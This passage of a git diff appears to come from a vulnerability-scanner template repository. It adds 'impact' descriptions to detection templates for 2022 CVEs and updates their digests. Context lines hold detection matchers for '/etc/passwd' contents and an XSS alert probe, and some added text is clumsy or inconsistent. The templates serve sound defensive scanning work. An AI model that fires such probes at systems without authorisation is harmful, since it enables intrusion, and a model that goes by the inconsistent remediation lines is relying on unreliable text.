           - var wpdevart.*"ajaxNonce":"(.*?)"
         internal: true
-# digest: 490a0046304402202b8c119453b4ece1789b303050671e7c4994da8bd4333c573b3812c7406939500220486403ec56214668fbbd641b69e865bd57b9d7134b881a2ba59509ed4e8f1a11:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d0a0e611557eb6248351bb47019b163eb991a598742f026c5852eb7e90dfc36f022100f70e5b8ef79ebcd9e63db343e344bacb00d8035811a6f1b733c189cbab47d703:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml
index 704b704a11..12603a4627 100644
--- a/http/cves/2022/CVE-2022-39952.yaml
+++ b/http/cves/2022/CVE-2022-39952.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data loss.
   remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above.
   reference:
     - https://fortiguard.com/psirt/FG-IR-22-300
@@ -62,4 +64,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022011b618470594227d0b43dd6fde4f1be275449840fd44d6c32559a463b3c79f92022100d2232e4624e59d4644b19658983c5cb495985451b53ce8781bbabda3be5b1285:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022053bc1110932507edfe9ca6378e69c836f9f37b662ab02876a2d70cde9a15e826022003d644cd4386cf0203bf5c95ab1b0b446fae022ed7107b819ae5ba798cea9565:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml
index 4ff4f419cb..bd456bbd7e 100644
--- a/http/cves/2022/CVE-2022-39960.yaml
+++ b/http/cves/2022/CVE-2022-39960.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive data.
   remediation: |
     Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d11f409330563d59079617684c33e1ab6368edb87b30924eb41b2cb9324d8e2a02207ae4e520aecab22ebb237befae74bfe803a935fade8e2aa46cfc40f2fcb8aa19:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022069bccea674b9391b3f8f1b6ad663a8161d08181e8b92c49312ba8e3dfafd75250220150fc3f6820922a24fb4b91b802e8885b0c259db7295085f543a7756a873d9d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml
index e9ee0f1f7d..51f425e9b2 100644
--- a/http/cves/2022/CVE-2022-39986.yaml
+++ b/http/cves/2022/CVE-2022-39986.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a655e54256aff795ba0bd8b2020e1773de1eabb92c73204b0c958ac28aec1a9c022100a7f108179e2df44cbb0282010ed80ac7061fadfe7a2ecb05803da2f5b8e799c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022076e0734411d1f33fab8b2595510b99bf21f55eaa7a3649f88d7928c32f194c7c022100df53fc06c5456e7a9521b73af45253a2b763e7faaa4f5df304f7da0a75b566ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml
index a01235d356..f96446e4c5 100644
--- a/http/cves/2022/CVE-2022-40022.yaml
+++ b/http/cves/2022/CVE-2022-40022.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
   remediation: |
     Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4a0a00473045022100e1eeb1606a3a6f79e9fe66394415c3399b22b1ba32e13767c1b36dc865dd970202207798a1d3e64ae2149cca1e2cc8c038e9a8f79680db10f5973c3e26803535ea31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022063ad387329e97b073445941ca26b6a7595457f6a1b86cdb21d6836d58607cb6e02203f9c85275d3e92f3e8a476191d7c4b2535d1ee717de797c2ce3a14d08116a02d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml
index 0c12efd966..01b637f41b 100644
--- a/http/cves/2022/CVE-2022-40083.yaml
+++ b/http/cves/2022/CVE-2022-40083.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.
   remediation: Download and install 4.9.0, which contains a patch for this issue.
   reference:
     - https://github.com/labstack/echo/issues/2259
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 301
-# digest: 490a0046304402207fbdb34103ce4fff776af27cd830e6c806d20ffb7e839869819c945458d8c71202207c75ff979052058488ac513a248cb39628d01dc6b3e3bcc33e739e60737530aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bf83819ed29975baff616857a9db3e701813eafca04590f35750f37b9c75f97202205f190f41d3420da8229433da3c706b8e11c8b2d7e4acfaf2919a762efffe97a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml
index fa1752d865..2331ac6f15 100644
--- a/http/cves/2022/CVE-2022-40127.yaml
+++ b/http/cves/2022/CVE-2022-40127.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability.
   reference:
@@ -79,4 +81,4 @@ http:
         regex:
           - 'type="hidden" value="(.*?)">'
         internal: true
-# digest: 490a00463044022055fd54696c0f229121b61d2859587439426a2eafb0caf973dcac878938fcbea90220024704539e53d6fe23eab9e6549ad1a02ecc8808c468c4941e8de890fc4c9cb5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200eeaf240d9375f3b82fb4a007f687f7cbd04c22d06aa819254581d1c4e2f691b022100ebda0041860ef7c4f3d814ecb83235de783f0c2fd8177e8050037413b69b62c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml
index 4b117ee452..e05e874af6 100644
--- a/http/cves/2022/CVE-2022-40359.yaml
+++ b/http/cves/2022/CVE-2022-40359.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204deda5937455061de3dff7ebda82761d87ac1077b4694436b010eeaad7f001dd022030179f6a42665c411b8487635c5ce9b888123cb4e517f448bccee4400c6bb066:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220337b0b0f951bef1518b0acab94cd8313f2ee2e23fce3c15ea83f5bbafd8f163a0221009d298ea263f6001946b32acd925227b04a97e4aa396ef054c2c81bebc43ebf02:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml
index 31b80e9ac9..9fa066b1d3 100644
--- a/http/cves/2022/CVE-2022-4050.yaml
+++ b/http/cves/2022/CVE-2022-4050.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Update to JoomSport plugin version 5.2.8 or later.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "jscaruselcont jsview2")'
         condition: and
-# digest: 490a00463044022071ebb84f4c0334f140104eb9934459797cf58f29e8c1b568964e6ee10a4b288902201016fb22ad29ab72a45a422e4f935e5082f9da75699ff764492c6d3fe152f9cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bf0b10fc40835b590836fbb39d3c408763903bb272b3204f6fcef4de50873b3102200dfd6200b28d1bf8c2c41d4720968ba1fad2c80c5a5c1c4c92724ae4001fab9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml
index cfb0596e67..e1b9879d2d 100644
--- a/http/cves/2022/CVE-2022-4057.yaml
+++ b/http/cves/2022/CVE-2022-4057.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.
+  impact: |
+    An attacker can gain access to sensitive information, potentially leading to further attacks.
   remediation: |
     Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d78b128eb2584248c748a95eb9c990fb5f72089c16feb5c317221d10608daad4022066ab0c5000357fdb5d5599eeb0840e328daad02a59bd8a72f9ba265d9ebec90f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201230a7722e24557c845a4a51c8ddfd7f79a09d58fe434273fd974d5ed50701a6022100acc3661936c66a1c6ac3353f67f9ec5f777a8f574732575103156aab18955e21:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml
index c69e1754b5..7ff0a7e98f 100644
--- a/http/cves/2022/CVE-2022-4060.yaml
+++ b/http/cves/2022/CVE-2022-4060.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
   remediation: |
     Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100971b3e0ae2962947b9989205ce5f97b920a68b2493d43256ed5b35c446e2537b022100d4f3330a2f836a971ce714339b0337687bc91d1b2914f86d3d4af1f87b6c51b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100aa7bbc4c43e029e3b8c854dc20579f075093e4e54bb74a34976da06e1e6a547c0220594d5121fb28ab2279c6e377a6cda8bdb5003437fae9bb8ba1d6058ff5f907d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml
index d568fe874d..29205bf34b 100644
--- a/http/cves/2022/CVE-2022-4063.yaml
+++ b/http/cves/2022/CVE-2022-4063.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
+  impact: |
+    The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.
   remediation: Fixed in version 2.1.4.1.
   reference:
     - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022026c9b3f0ace29f58695d505cf547d38889043b13051ea99d138a8bfac11c29e102205512c5a195192a5990eafccb46757312193934264ef4d5370f8a94babea594f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008265e82c0424a209e328fe0e85b1c6d9591122268675071c9e3d422c8feefde002205996c152b0ce8d743864f2d6f963b077502c849f1158cdb627262ba8fc48d6b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml
index 1faa1ee115..40bb52365c 100644
--- a/http/cves/2022/CVE-2022-40684.yaml
+++ b/http/cves/2022/CVE-2022-40684.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.
   remediation: |
     Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability.
   reference:
@@ -65,4 +67,4 @@ http:
           - Invalid SSH public key.
           - cli_error
         condition: and
-# digest: 4a0a004730450220797b63021212f388b8ee09c4caf1415524d664e703ece00811901bb02f37c07d022100aa2b34bbaf57c0f63aa24999b3723f0df08b57189555e9ddb60c879551a3f603:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022028ba6ebd3aff268b665c62a03ee645c462d3636ace816c42a5482071f3b8fdd802203060e587781635c11bb6ebe18dfe5e11c34abd3aacd8b29912f8428917f93325:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml
index 1e13b5c93a..3041345941 100644
--- a/http/cves/2022/CVE-2022-40734.yaml
+++ b/http/cves/2022/CVE-2022-40734.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.
   remediation: |
     Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: regex
         regex:
           - "root:[x*]:0:0"
-# digest: 4a0a00473045022100b6fb9ab2990d32d1e84555db57a9ad1c3cb819b76c7f0ee5bf37ead48b60691e0220577b10f2f4e9db726b974294c646ef4191d73725df98d5ba2afe43ce13013be1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201cf074108cc3ae1aaa728d33afd29fa7bef7d3cd48ac5a26cbbd56bb1aa6e9f9022100ae0d0952aa7468ec5fd70fb9a5501fa1a19ca83055933cc923006a155187bfe5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml
index a1351c92b7..f056628912 100644
--- a/http/cves/2022/CVE-2022-40843.yaml
+++ b/http/cves/2022/CVE-2022-40843.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022044264562f6f6fc371b4d604c6c0c85e1cedcecd81be1dc998a7fed1b15e7dcec022100a373fbc82487a6b10f28105ea86d2091ae1405b89ae6e370fd5cb5566fa45ea3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210081441e2a5c2326cfa01e69f85c9a208e5e638811b41f471a26613603ec85b89b022100cd20434b3377942f4941ab6de3ceb68f96465fae72a5c3c656df1aaf3a77b3ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml
index 4b7585ec9a..27a4f98577 100644
--- a/http/cves/2022/CVE-2022-40879.yaml
+++ b/http/cves/2022/CVE-2022-40879.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022050b144888bf3bae985fea1166342839996b426aff519798faaf5fd1a0ad7eaaf022017bd9d75a37f07daaad95aa2cd07aae5baa6d109318979c11b5b25c1ea2561ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022047dfe8aae27000ca67ee23ab329531f941702ca936d1e7ada7d42fc851cbe427022100f8fe68d36c2b725ff0a534024151706cd35ea1fc780a330e38faafbc75752516:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml
index 44f24bc880..6f12999fe5 100644
--- a/http/cves/2022/CVE-2022-40881.yaml
+++ b/http/cves/2022/CVE-2022-40881.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
   remediation: |
     Apply the latest patch or upgrade to a non-vulnerable version of SolarView.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008e0e4004d93a7cc1038e323852cf640e1d4ef6fdcf620035adc63ab1283a00ee022100dada836d74523cd3bdde9ec8f47e8dab67678eab911cab0f213b5771c8136d94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202959c3f6332ea36414a5aac4fe4c032d689cc2d8a8dec3fb97356772816c27570220043014fbbe15c3f2eddb95e6daac71793306ad9cd7ca956f983b4daeac2f64b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml
index eaf11a3908..6580e46e0b 100644
--- a/http/cves/2022/CVE-2022-4117.yaml
+++ b/http/cves/2022/CVE-2022-4117.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site.
   remediation: |
     Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")'
         condition: and
-# digest: 490a004630440220325f3629fabcfc50f966b9269b67c2ef432c571e5e90674d2ac8782d3b357a780220505f5fb9b7890a547b63cc5ab581a28af9dea1bff1b1a2fb3ee29871e52f28be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100838ce75e63506d7d9493c09c954942c02f3e7fbf0387677304c982fcca641a3f022100d57da76c6532ff47a4e5d645c1c36caa8f9b846319624ef2091ef5ff1e46afad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml
index af9f342382..c596ac628d 100644
--- a/http/cves/2022/CVE-2022-4140.yaml
+++ b/http/cves/2022/CVE-2022-4140.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can access sensitive files on the server, potentially exposing sensitive information.
   remediation: Fixed in version 2.8.5.
   reference:
     - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022046c5c5a69a195f0c635299eb7173ae7f7889bb89cd6fa4e0e230efedaa61feb7022100a563dd7868e06822527d7366e6f5c57f7dc26a7a7cc64d5f09efd2b3fc976cad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009f400df633cedba0b8b1a263769ea8feb2d52d7fb53bca4a74cda4b2aa545d6e022061f5b59a6aa8b35172894131889fea1e5665fd7ac59c9a5760f1ab7087434f66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml
index 66e3161805..092a28a638 100644
--- a/http/cves/2022/CVE-2022-41441.yaml
+++ b/http/cves/2022/CVE-2022-41441.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "POProcessTimeout")'
         condition: and
-# digest: 4a0a00473045022100c786ed15dc64f08e6349112af7184449d3e6c8969776a5c54f86d2b043404ed102200ddf8054b3b1defa8c1d708d44af18ac2f99f20764c42a90ad3ab22173eb0dfc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008c53679c520f36a38c5a1ff651bba006fc66af16b145f9d9af83d88780eca6ba02203551b3f219d3e6700630b40878be39780a83cdfbd6ac21d1172e402c0887904d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml
index 2587cbd1bd..cb3224dd9f 100644
--- a/http/cves/2022/CVE-2022-41473.yaml
+++ b/http/cves/2022/CVE-2022-41473.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207eef4fd65ccff94eb14c217c2e15cdc8ded80b4b20ca7b0a2b2c7a70b785c3ba022003324ececc3cbe9732c3a0810a432452ec1545ad6cfd7fe0b585815588661758:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022017f78ef7941857a58e9d466a1a11671ff990f016319263344c77eabf239b20ff022100a6546bd6bea49a6eb5f3ee39e34a3a8246e854fa6805649aff84156ab0aad4ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml
index c000cd95f3..20c2990a2f 100644
--- a/http/cves/2022/CVE-2022-41840.yaml
+++ b/http/cves/2022/CVE-2022-41840.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
   remediation: |
     Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204b21087bd0cc40ba7d747a4b15aacf612c79ba1c3cabbfb68ebf76e8c352fb500220743765d637d67b8f22a38fb8c801785cd51a9570e704a2200f801117e3d724e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008403775a7765fa0bd2a1b570b28ecc668a7b273d01f7c3464577395e35211a2c02202f8f82a57cbf1b8a54f82885e9b0c04a0d94c43c4971c2a4a3004b3a4871faed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml
index 51e5b11904..47d83c8d12 100644
--- a/http/cves/2022/CVE-2022-42094.yaml
+++ b/http/cves/2022/CVE-2022-42094.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
   reference:
@@ -166,4 +168,4 @@ http:
         regex:
           - name="form_token" value="(.*)"
         internal: true
-# digest: 4a0a0047304502210081bca4bad791aacaa0520767b1dbe3cfc0bccb85188d15109b87b55000b3954d02202f1db2ba1f2796e303e12a48aadfe3ba1bf72bd54a21d56c94cbd5c1f7459bec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009423d24591a621c265ff58d530db4d6bac38d5a05e11eaee612ba4153004b9f7022038c091f07d28bdf026cceffc6a5bd07ac874afcb51c621ed0738ffe72a5ccda5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml
